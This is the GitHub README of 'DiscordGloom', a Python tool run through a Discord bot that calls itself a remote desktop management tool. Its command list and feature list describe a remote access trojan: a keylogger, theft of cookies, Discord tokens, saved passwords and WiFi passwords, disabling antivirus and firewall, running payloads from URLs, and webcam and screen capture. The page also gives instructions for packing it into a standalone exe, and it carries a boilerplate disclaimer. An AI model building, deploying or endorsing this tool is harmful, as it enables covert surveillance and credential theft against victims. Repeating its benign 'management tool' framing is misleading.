Skip to content

Discord Gloom is a remote desktop management tool with an intuitive interface for efficient navigation and control over remote systems. It enhances communication, productivity, and offers an emergency switch kill option for added security and swift termination of processes in critical situations.

License

Notifications You must be signed in to change notification settings

haydenbanz/DiscordGloom

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

51 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

DiscordGloom πŸŒ‘ V 2.1

DiscordGloom Logo

Python - DiscordGloom MIT License Python Version Discord.py library GitHub Issues GitHub Pull Requests GitHub Stars Profile Views

πŸ“– Description

Discord Gloom is a remote desktop management tool with an intuitive interface for efficient navigation and control over remote systems. It enhances communication, productivity, and offers an emergency switch kill option for added security and swift termination of processes in critical situations.

Updates

  • πŸ› Fixed bugs.
  • πŸš€ Added new features:
    • voice_get: Records audio and sends it.
    • !streamscreen: Streams screen.
    • !voice_send: Converts text to speech.
  • πŸ”₯ Deactivate antivirus firewall.
  • πŸ”Š Keylog log.
  • πŸ–ΌοΈ Fixed screenshot and screen share.

πŸ“œ Feature

  • πŸ“· Capture screenshots
  • πŸ“Έ Take webcam photos
  • πŸ–₯️ Retrieve system information
  • πŸ“₯ Download files remotely
  • πŸ“œ Retrieve system logs
  • πŸ”ͺ Kill specified processes
  • πŸ’» Control screenlogger functionality
  • πŸš€ Set and execute payloads from URLs
  • πŸ“Ά Grab saved WiFi passwords
  • πŸ”΅ Ping functionality to check bot responsiveness
  • πŸ–ΌοΈ Screenshot and screen share
  • πŸ§‘β€πŸ’»Keylogger
  • πŸ–ΌοΈScreenstream

Unauthorized use is strictly prohibited.

πŸ› οΈ Prerequisites

  • Python Version
  • Discord.py library
  • Other required Python packages listed in requirements.txt

πŸš€ Usage

To use DiscordGloom, follow these steps:

  1. Clone or download the repository git clonehttps://github.com/haydenbanz/DiscordGloom.git or DiscordGloom download).
  2. Navigate to the DiscordGloom directory: cd DiscordGloom
  3. Install the required Python packages by running: pip install -r requirements.txt
  4. modify main.py file [add your discord bot token]
  5. Start DiscordGloom by running: python bot.py
  6. Check your Discord server where you added the bot for remote access.

Compline to exe

  1. Run given command in terminal pip install pyinstaller
  2. Run given command in terminal pip install pywin32
  3. Open your terminal in file dir and paste command pyinstaller --onefile --add-data "*.py;." bot.py OR pyinstaller --onefile --exclude-module pythoncom bot.py

πŸ”§ Configuration

  • Configure the bot by editing the bot.py file.
  • Replace with your discord token by changing text_channel_id = # Replace with your desired text channel ID.
  • Replace with your discord token bot.run('YOUR_TOKEN').

Commands

  • !bot_help
  • !cam_list
  • !camic
  • !clear
  • !download
  • !grab_cookies
  • !grab_distoken
  • !grab_password
  • !grab_wifi
  • !help Shows this message
  • !kill_process
  • !list_process
  • !ping
  • !powershell
  • !rat_down
  • !screenlogger
  • !screenshot
  • !set_payload
  • !sys_info
  • !sys_log
  • !sys_restart
  • !sys_shutdown
  • !stopkeylogger
  • !startkeylogger
  • !disablefirewall
  • !disableantivirus
  • !recscreen
  • !stopscreen
  • !streamscreen
  • !voice_get
  • !voice_send

🀝 Contribution

GitHub Issues GitHub Pull Requests

  1. Fork the repository on GitHub.
  2. Clone your forked repository to your local machine.
  3. Create a new branch for your changes.
  4. Make your changes and commit them.
  5. Push your changes to your fork.
  6. Create a pull request on GitHub. Contributions to this project are welcome. If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

🌐 Support

Discord

Join our Discord server (Update Soon) for support, discussions, and updates related to DiscordGloom.

πŸ“œ License

MIT License

DiscordGloom is released under the MIT License. See the LICENSE file for more details.

If you have any questions or feedback, please contact the project maintainers:

πŸ‘€ 0x_hayden πŸ“§ Email: cubedimension@protonmail.com πŸ“§ Email:barneshayden278@gmail.com

πŸ™ Credits

This project is maintained by:

Contributor Name

Contributors and Developers

Contributor Name Contributor Name

β˜• Support

If you find this project helpful, consider buying us a coffee:

Buy Me a Coffee

🚫 Disclaimer

The creators of this project are not responsible for any unauthorized or misuse of the software. DiscordGloom is intended for enhancing Discord servers in a responsible and ethical manner.

About

Discord Gloom is a remote desktop management tool with an intuitive interface for efficient navigation and control over remote systems. It enhances communication, productivity, and offers an emergency switch kill option for added security and swift termination of processes in critical situations.

Topics

Resources

License

Code of conduct

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages